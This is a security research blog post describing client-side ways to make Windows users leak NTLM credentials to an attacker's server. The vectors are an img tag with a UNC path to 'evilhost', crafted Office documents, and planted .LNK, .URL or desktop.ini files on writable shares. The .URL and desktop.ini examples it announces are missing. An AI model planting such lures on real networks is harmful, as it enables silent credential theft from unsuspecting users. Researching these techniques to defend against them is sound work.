Article by Alexey Tuyrin from DSecRG
Today we will talk about client-side attacks. An attack of a network is a progressive action. Usually, we escalate our rights step-by-step from nothing to a domain administrator.
Even casual un-privileged users can give us something interesting, for example access to some shared resources. But how can we get these user rights?
We can enforce users to authenticate on a controlled machine. There are alt least three main ways to interact with user. They are very abstract.
1) HTML and browser
We can use a social engineering or a MitM attack like dns-poisoning to bring users to our web site with a following code:< i m g s r c= ” \ \ e v i l h o s t \ t e s t ” >
Their browsers will try to take the image from our server and give us their credentials. At the same time users will not know about such actions.
2) Crafted document
We can create special document (like MS Excel file) and send it to users via e-mail or put it on shared resources. When a user opens it, office program tries to connect our server and give us user's credential. We will talk about it in the next blog post.
3) Windows Explorer and shared resources
If we have permission to write to some shared resources (for example file server or or directory on terminal server), we can create a specified file.
When somebody browses to a folder with the file, Explorer will try to connect to our server without any interaction from a user.
Such a "specified file" can be:
- .LNK - Windows Shortcut File.
There is ability for setting an icon to file. We can set path of it to our server and Explorer will try to download it.
- .URL - Internet Location File.
Like LNK-file - setting an icon to a file, but URL is a primitive text file. So we write a following text and save it with URL extension:
The file is used for folder's customization. There is some different fields (InfoTip, desktop.ini, LocalizedResourceName, IconFile (IconResource for Vista/7)) which can give us necessary links to our server.
Fields' influences on Explorer are different (you can read about it here http://www.tarasco.org/security/payload/index.html).
A little limitation is a folder with desktop.ini, which should be ‘system'. It can be set by ‘attrib +s folder_name'. But there are some pluses: desktop.ini are ‘hidden' by default, and folders like "My Documents", "Disc C(D, E,..)", "Desktop" are ‘system' by default.
Simple example of desktop.ini:
Cross-posted from Digital Security Research Group